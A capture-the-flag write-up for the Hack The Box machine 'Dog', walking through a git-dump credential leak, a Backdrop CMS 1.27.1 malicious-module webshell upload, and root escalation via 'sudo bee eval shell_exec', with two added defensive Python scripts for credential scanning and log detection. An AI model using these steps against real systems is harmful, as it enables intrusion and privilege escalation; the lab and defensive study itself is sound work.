HTB - Dog

Enumeration:

# Nmap 7.95 scan initiated Fri Mar 28 13:28:37 2025 as: /usr/lib/nmap/nmap -v -p - -Pn -T4 -A -oN nmaptcp dog.htb
Nmap scan report for dog.htb (10.10.11.58)
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
|_http-title: Home | Dog
| http-git:
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 6.958 days (since Fri Mar 21 14:30:06 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT      ADDRESS
1   22.46 ms 10.10.14.1
2   22.70 ms dog.htb (10.10.11.58)

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 28 13:28:57 2025 -- 1 IP address (1 host up) scanned in 20.38 seconds

User exploit

Looking at the nmap scan, we see two open ports: 22 (SSH) and 80 (web). The web port contains a few pages of dog-related content, hosted by Backdrop CMS. The nmap scan reported a .git/ repository that we can dump and extract using GitTools.

# Download the content of the .git folder
$ bash gitdumper.sh http://dog.htb/.git/ ../dog_dmp/

# Extract the commit files from it
$ bash extractor.sh ../dog_dmp/ ../dog_ext/

This gives us access to commit 0-8204779c764abd4c9d8d95038b6d22b6a7515afa, which we can dig around in. The first thing of interest is settings.php, which contains a MySQL connection string with an embedded password: $database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';. Trying these credentials on the Backdrop CMS login page only gets us a (pretty informative) "Sorry, unrecognized username" error. Grepping the recovered files for htb turns up the email address tiffany@dog.htb, which lets us log in with the password found above.
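The costly part of the exposed .git directory above is a configuration file with a credential committed into it. As an added example (my own code, not part of the original writeup or of GitTools), here is a small Python scanner that flags URI-style database connection strings carrying an embedded password, so a dumped repository or your own checkout can be checked before someone else does it. The settings.php fragment is constructed and its password is a placeholder; the $replica line, the scan_tree helper, the file-extension list and the report field names are my own assumptions.

```python
import os
import re
from urllib.parse import urlsplit

# Constructed sample modelled on the settings.php line found in the writeup.
# The password is a placeholder and $replica is a made-up variable, not a Backdrop setting.
SAMPLE_SETTINGS = """<?php
$database = 'mysql://root:EXAMPLE_PASSWORD@127.0.0.1/backdrop';
$database_prefix = '';
// Connection without an embedded password: reported as clean.
$replica = 'pgsql://readonly@10.0.0.5/backdrop';
"""

# URI-style connection strings: scheme://user:pass@host/db, ending at a quote or whitespace.
DB_URI_RE = re.compile(
    r"(?P<uri>(?:mysql|mysqli|pgsql|postgres|postgresql|mongodb|redis)://[^'\"\s]+)"
)

# File types worth scanning in a dumped repository (assumed list, extend as needed).
SCAN_EXTENSIONS = (".php", ".inc", ".yml", ".yaml", ".json", ".env", ".ini")


def find_embedded_credentials(text):
    """Return one finding per connection string whose userinfo part carries a password."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for match in DB_URI_RE.finditer(line):
            parts = urlsplit(match.group("uri"))
            if not parts.password:
                continue  # user-only or host-only URIs are not a leak
            findings.append({
                "line": lineno,
                "scheme": parts.scheme,
                "user": parts.username,
                "host": parts.hostname,
                # Never echo the secret itself in a report.
                "redacted": match.group("uri").replace(parts.password, "***"),
            })
    return findings


def scan_tree(root):
    """Walk a checkout (for example the extractor's output directory) and report findings per file."""
    report = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_embedded_credentials(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    for hit in find_embedded_credentials(SAMPLE_SETTINGS):
        print(f"line {hit['line']}: {hit['scheme']} as {hit['user']}@{hit['host']} -> {hit['redacted']}")
```

Run it as-is to see the single finding from the constructed sample, or call scan_tree("../dog_ext/") against an extracted dump. On the defensive side, the two controls that make this finding a non-event are denying web access to /.git/ at the Apache level and keeping settings.php (or at least its credentials) out of version control; a scanner like this is the check that tells you whether the second one is actually being followed.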

Now that we are logged in, the Status report page shows that the site runs Backdrop CMS v1.27.1. Armed with this information, a quick Google search turns up Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE). This exploit follows the very common CMS pattern where an administrator can upload a malicious plugin that executes arbitrary code. First, let’s generate the module.

$ python backdrop.py http://dog.htb
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://dog.htb/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://dog.htb/modules/shell/shell.php

The upload URL printed by the script is not quite right, but the correct one is easy to find (http://dog.htb/?q=admin/modules/install). We click Manual installation and then Upload a module, theme, or layout archive to install. Unfortunately, zip files are not accepted by the form, so we simply repack the module as a tar archive instead.

$ unzip shell.zip
Archive:  shell.zip
 extracting: shell/shell.info
 extracting: shell/shell.php

$ tar -czvf shell.tar.gz shell/
shell/
shell/shell.info
shell/shell.php

We then upload our module and we receive a success message.

We can then navigate to http://dog.htb/modules/shell/shell.php and send commands to the server as www-data. Looking through /etc/passwd for the users on the machine, we find johncusack. We can then log in over SSH with this username and tiffany’s password, and get the user flag.
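From the defender's side, the sequence above (an administrator installs a module, and moments later a .php file inside that module is requested directly) is a very recognisable pattern in the Apache access log. As an added example (my own code, not from the writeup or from Backdrop), the Python below parses combined-format log lines and raises an alert for any direct request to a PHP file under /modules/, escalating it when the same client sent a module-install POST shortly before. The log lines are constructed; the install-form paths are assumed from the URLs used in the writeup, and the assumption that ordinary Backdrop traffic goes through the index.php router (the ?q= URLs above) rather than hitting module scripts directly is one you should validate against your own site's normal traffic.

```python
import re
from datetime import datetime, timedelta

# Apache combined-log prefix: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths of the module-install form (assumed from the URLs used in the writeup).
INSTALL_PATHS = ("/?q=admin/modules/install", "/admin/modules/install")

# A .php file requested directly from inside modules/, bypassing the index.php router.
MODULE_PHP_RE = re.compile(r"^/modules/[^/]+/[^/?]+\.php")

# Constructed sample log: one administrator session that installs a module and then
# calls a script inside it, plus unrelated traffic and a stray probe from another client.
SAMPLE_LOG = """\
10.10.14.5 - - [28/Mar/2025:13:40:01 +0000] "GET /?q=admin/modules/install HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [28/Mar/2025:13:40:31 +0000] "POST /?q=admin/modules/install HTTP/1.1" 303 0 "-" "Mozilla/5.0"
10.10.14.5 - - [28/Mar/2025:13:41:02 +0000] "GET /modules/shell/shell.php HTTP/1.1" 200 231 "-" "Mozilla/5.0"
10.10.14.9 - - [28/Mar/2025:13:45:00 +0000] "GET /?q=node/3 HTTP/1.1" 200 8811 "-" "Mozilla/5.0"
10.10.14.9 - - [28/Mar/2025:15:02:11 +0000] "GET /modules/oldmod/run.php HTTP/1.1" 404 196 "-" "curl/8.5"
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_module_abuse(lines, window=timedelta(minutes=10)):
    """Return (ip, path, reason) alerts for direct module-script hits; the reason is
    escalated when the same client POSTed to the module-install form within `window`."""
    alerts = []
    last_install = {}  # client ip -> time of its most recent module-install POST
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: ignore, but a real pipeline should count these
        if rec["method"] == "POST" and rec["path"].startswith(INSTALL_PATHS):
            last_install[rec["ip"]] = rec["ts"]
            continue
        if MODULE_PHP_RE.match(rec["path"]):
            since = last_install.get(rec["ip"])
            if since is not None and rec["ts"] - since <= window:
                reason = "module script executed shortly after a module install (likely uploaded code)"
            else:
                reason = "direct request to a module PHP file"
            alerts.append((rec["ip"], rec["path"], reason))
    return alerts


if __name__ == "__main__":
    for ip, path, reason in detect_module_abuse(SAMPLE_LOG.splitlines()):
        print(f"{ip} {path}: {reason}")
```

Two practical notes. First, the zip-versus-tar detail in the writeup shows why archive-type restrictions on the install form are not a security boundary: the feature exists to run uploaded code, so the real controls are who holds the permission to install modules, whether that account's password is unique, and whether installs are logged and reviewed. Second, the install POST in the log is the useful signal on its own; even a benign install is worth a ticket on a site that is not supposed to change.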

Root exploit

We can run sudo -l to see if we can execute anything as root on the machine.

$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

It looks like we can run Bee, a command-line utility for Backdrop CMS, as root. Looking at the help menu, we quickly spot the eval command, which executes arbitrary PHP code. Note that for this to work we have to be in the directory where Backdrop CMS is installed (otherwise we get "✘ The required bootstrap level for 'eval' is not ready."). We can use this to get the root flag.

# Change directory to the Backdrop folder
$ cd /var/www/html

# Execute PHP command using Bee
$ sudo /usr/local/bin/bee eval "shell_exec('cp /root/root.txt /tmp/dax.txt')"
$ sudo /usr/local/bin/bee eval "shell_exec('chmod 777 /tmp/dax.txt')"

Resources:

https://github.com/internetwache/GitTools - GitTools
https://www.exploit-db.com/exploits/52021 - Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
https://github.com/backdrop/backdrop - Backdrop CMS
https://github.com/backdrop-contrib/bee - Bee